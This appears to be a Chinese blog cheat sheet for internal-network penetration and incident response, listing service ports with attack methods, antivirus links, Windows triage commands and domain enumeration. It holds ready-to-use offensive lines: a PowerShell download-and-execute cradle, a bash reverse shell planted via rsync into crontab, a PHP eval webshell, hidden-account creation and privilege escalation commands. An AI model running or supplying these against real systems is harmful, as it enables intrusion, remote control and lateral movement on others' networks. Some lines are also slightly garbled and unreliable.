对内网服务端口进行扫描

本文涉及的产品
模型在线服务 PAI-EAS,A10/V100等 500元 1个月
交互式建模 PAI-DSW,5000CU*H 3个月
模型训练 PAI-DLC,5000CU*H 3个月
简介: 对内网服务端口进行扫描,根据开放的端口服务选择横向的方法。

对内网服务端口进行扫描,根据开放的端口服务选择横向的方法。

常见端口:

7001,80,8080,11211,6379,1099,1090,8088,9081,9080,9090,3306,1433,1521,5432,27017,8069,9200,9300,8161,50075,50070,873,5984


ftp服务 21 爆破密码

远程桌面 3389 爆破密码/pth

weblogic 7001、80 反序列化/控制台弱口令

zookeeper服务 2181 未授权访问

redis数据库 6379 未授权访问

Memcached服务 11211 未授权访问

RMI服务 1099、1090 反序列化

Docker Remote API 2375 未授权访问

tomcat 80、8080、8081... 控制台弱口令

websphere 080、9081、9090 反序列化

MySQL 3306 弱口令udfrce

mssql 1433 弱口令rce

Oracle 1521 弱口令

PostgerSQL 5432 弱口令

MongoDB 27017 弱口令/未授权访问

CouchDB 5984 未授权访问

Smtp协议 25 弱口令/未授权访问

Zabbix服务 8069 远程命令执行

Elasticsearch服务 92009300 未授权访问/远程命令执行

Axis2 8080 弱口令

Jboss 8080 反序列化/控制台弱口令

activeMQ 8161 文件上传

Hadoop 50075、50070 信息泄露/命令执行

sync服务 873 未授权访问

struts框架 80、8080 未授权访问


#应急工具

#病毒分析:

PCHunter:http://www.xuetr.com

火绒剑:https://www.huorong.cn

Process Explorer:https://docs.microsoft.com/zh-cn/sysinternals/downloads/process-explorer

processhacker:https://processhacker.sourceforge.io/downloads.php

autoruns:https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns

OTL:https://www.bleepingcomputer.com/download/otl/


#病毒查杀

卡巴斯基(推荐理由:绿色版、最新病毒库):

http://devbuilds.kaspersky-labs.com/devbuilds/KVRT/latest/full/KVRT.exe  

大蜘蛛(推荐理由:扫描快、一次下载只能用1周,更新病毒库):

http://free.drweb.ru/download+cureit+free

火绒安全软件:

https://www.huorong.cn

360杀毒:

http://sd.360.cn/download_center.html


#病毒动态

CVERC-国家计算机病毒应急处理中心:http://www.cverc.org.cn

微步在线威胁情报社区:https://x.threatbook.cn

火绒安全论坛:http://bbs.huorong.cn/forum-59-1.html

爱毒霸社区:http://bbs.duba.net

腾讯电脑管家:http://bbs.guanjia.qq.com/forum-2-1.html


#在线病毒扫描网站

多引擎在线病毒扫描网 v1.02,当前支持 41 款杀毒引擎:

http://www.virscan.org        

腾讯哈勃分析系统:

https://habo.qq.com          

Jotti 恶意软件扫描系统:

https://virusscan.jotti.org      

针对计算机病毒、手机病毒、可疑文件等进行检测分析:

http://www.scanvir.com        


#Webshell查杀

D盾_Web查杀:

http://www.d99net.net/index.asp

河马 webshell 查杀:

http://www.shellpub.com

深信服 Webshell 网站后门检测工具:

http://edr.sangfor.com.cn/backdoor_detection.html

Safe3:

http://www.uusec.com/webshell.zip




#window

powershell.exe -nop -w hidden -c "IEX ((new-objectnet.webclient).downloadstring('http://x.x.x.x:80/a'))"


#查看管理组(工具D盾|ProcessExplorer[电脑各种信息])

>net localgroup administrators


#查看非隐藏用户

>net user


#查看指定用户

>net user Guest


#创建隐藏账号 $结尾

>net user username$ pwd /add


#运通过本地用户和组的管理页面(或者“计算机管理”)的可以查看到隐藏账户:

>lusrmgr.msc


#删除隐藏用户

>net user username$ /del


#打开“系统信息功能”并依次点击“软件环境→正在运行任务”就可以查看到进程的详细信息,比如进程路径、进程 ID、文件创建日期、启动时间等:

>msinfo32


#查看开机启动项是否正常,特别注意如下三个注册表项:

\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Runonce


#检查组策略

#计算机配置-Windows设置-脚本(启动/关机)

#用户配置-Windows设置-脚本(登录/注销)

>gpedit.msc


#访问“计算机管理”功能,查看“任务计划程序库”,查看是否存在可疑的计划任务:


#检查计算机与网络上的其它计算机之间的会话或计划任务,如有,则确认是否为正常连接

>schtasks.exe


#查看系统版本以及补丁信息

>systeminfo


#排查当前用户最近打开文件

>%userprofile%\recent


#Windows 的C:\Windows\System32\winevt\Logs路径下存放了系统各类日志文件

#双击选中 “Securuty” 安全事件日志文件,可进入事件查看器(另一种办法是 Win+R 打开运行,输入“eventvwr.msc”,回车运行,直接打开“事件查看器”):


#LogParser 的一些用法(导出应用程序日志、安全日志、系统日志)

基本查询结构

Logparser.exe –i:EVT –o:DATAGRID "SELECT * FROM c:\xx.evtx"

查询登录成功的所有事件

LogParser.exe -i:EVT –o:DATAGRID  "SELECT *  FROM c:\Security.evtx where EventID=4624"

查询登录失败的所有事件

LogParser.exe -i:EVT –o:DATAGRID  "SELECT *  FROM c:\Security.evtx where EventID=4625"

查询系统历史开关机记录

LogParser.exe -i:EVT –o:DATAGRID "SELECT TimeGenerated,EventID,Message FROM c:\System.evtx where EventID=6005 or EventID=6006"


#其它

netstat -ano   #查看所有网络连接及其PID

netstat -ano | findstr 443  #过滤特定端口的网络连接

netstat -ano | findstr TCP  #过滤TCP连接

tasklist | findstr 18544    #查看PID为18544的进程

taskkill /F /pid 18544      #强制结束进程


#fscan64.exe

fscan64.exe -h 10.x.x.0/24 -o 10-x-x-C.txt


#nmap

nmap —script nfs-showmount IP

nmap -p 873 —script rsync-list-modules IP

#打开终端利用nmap扫描工具对目标主机进行扫描

nmap -sT -v -O 192.168.235.140


#扫描某个网段开通22端口的机器

nmap -p 22 172.16.10.*


#识别系统指纹信息(打开的端口,MAC地址,操作系统类型,内核版本)

nmap -O 172.16.10.125


#扫描出局域网中所有主机

netdiscover


#sqlmap

sqlmap -r 1.txt


#rsync

rsync rsync://ip:873

可以在本地写个shell而后执行命令 rsync -av shell.php rsync://ip:873/src/var/wwww


访问/src/etc/crontab定时任务目录

在本地写个.sh文件

#!/bin/bash /bin/bash -i >& /dev/tcp/192.168.182.199/4444 0>&1


#搜索语法 X是数字,比如23

inurl:asp?id=X

inurl /admin/login.php 公司

inurl /admin/login.jsp 公司

inurl /admin/login.html 公司

inurl /admin/login.asp 公司

jkl;'

info:商城 AND 积分商城


#御剑后台扫描工具

找到rar、jar、zip等后缀的文件,搞下来解压反编译查找可访问的文件和url


#yxcms后台配置模板

<?php eval($_POST["cmd"]);?>


# CS 的 Backdoor 在服务器上传后门工具


#弱口令扫描x-crack

Weak password scanner, Support: FTP/SSH/SNMP/MSSQL/MYSQL/PostGreSQL/REDIS/ElasticSearch/MONGODB


--- window ---

查询本机用户列表:net user

查询本机管理员(通常含有域用户): net localgroup administrators

查询域管理员用户:net group"domain admins"/domain

查询域用户:net user /domain

查询域里面的工作组: net group /domain

查询域名称:net view /domain

查询域内计算机:net view /domain:XX

查询域控制器:net time /domain

查询域管理员用户组: net localgroup administrators /domain

域用户添加到本机: net localgroup administrators workgroupluser001 /add

查看域控制器(如果有多台 ): net group"“Domain controllers"

查询本机 IP 段、所在域等:ipconfig /all

查询同一域内机器列表:net view

查询所有域控制器:dsquery server

搜索域内所有域控制器并显示其DNS主机名和站点名

查询域内机器名:dsquery computer

搜索域内名称以“admin”开头的前10台机器

dsquery computer domainroot -name admin* -limit 10

查询域用户:dsquery user

搜索域内名称以“admin”开头的前10个用户

dsquery user domainroot -name admin* -limit 10

查询域内联系人:dsquery contact

搜索域内名称以“admin”开头的前10个联系人

dsquery contact domainroot' -name admin*-limit 10

查询域内子网:dsquery subnet

查询域内用户组:dsquery group

搜索在DC-SUPER、DC-COM 域中的所有组

dsquery group dc-super,dc-com lmore

查询域内组织单位:dsquery ou

查询域内站点:dsquery site

搜索域中所有站点的名称

dsquery site -o rdn

查询域内所有计算机:net group"domain computers"/domain

查询超过 4 周未登录的计算机: dsquery computer -inactive 4查询超过4 周未登录的用户:dsquery user -inactive 4

通过组织单位查询计算机:dsquery computer"ou=xxdc-xx,dc=com

相关文章
|
1月前
|
前端开发 Java 数据库连接
Springboot-MyBatis配置-配置端口号与服务路径(idea社区版2023.1.4+apache-maven-3.9.3-bin)
Springboot-MyBatis配置-配置端口号与服务路径(idea社区版2023.1.4+apache-maven-3.9.3-bin)
39 0
|
2天前
|
网络协议 Linux Shell
如何在 CentOS 中配置 SSH 服务的 TCP 端口转发
如何在 CentOS 中配置 SSH 服务的 TCP 端口转发
3 0
|
1月前
|
安全 Linux 网络安全
【专栏】在 Linux 中,端口连接服务和应用,过多开放的端口可能带来安全隐患,教你一招找出所有开放的端口,然后直接干掉!
【4月更文挑战第28天】在 Linux 中,端口连接服务和应用,过多开放的端口可能带来安全隐患。要找出开放端口,可使用 `netstat -anp`、`lsof -i` 或 `nmap` 命令。关闭端口可通过停止相关服务、修改防火墙规则或禁用网络接口。注意不要随意关闭重要端口,操作前备份数据。保持端口安全对系统安全至关重要。
|
1月前
|
弹性计算 运维 Shell
|
1月前
扫描端口nc
扫描端口nc
13 0
|
1月前
|
机器学习/深度学习 网络协议 数据安全/隐私保护
远程访问本地jupyter notebook服务 - 无公网IP端口映射
远程访问本地jupyter notebook服务 - 无公网IP端口映射
|
1月前
|
网络协议
第二轮学习笔记: 扫描工具 -- nmap端口扫描
第二轮学习笔记: 扫描工具 -- nmap端口扫描
38 0
|
1月前
|
Java Linux
linux一键启动和停止多个端口服务脚本:springboot项目打jar包指定多个端口
linux一键启动和停止多个端口服务脚本:springboot项目打jar包指定多个端口
|
1月前
|
Linux
遇到Linux 端口占用时如何查看并杀掉服务进程
遇到Linux 端口占用时如何查看并杀掉服务进程
|
1月前
|
网络协议 Linux
百度搜索:蓝易云【【http服务】使用命令来查看和停止端口教程。】
通过按照上述步骤使用命令来查看和停止端口,您可以轻松地管理正在运行的服务。请确保在停止端口上的服务时,选择正确的端口号,并谨慎操作以避免影响其他正常运行的服务。
36 0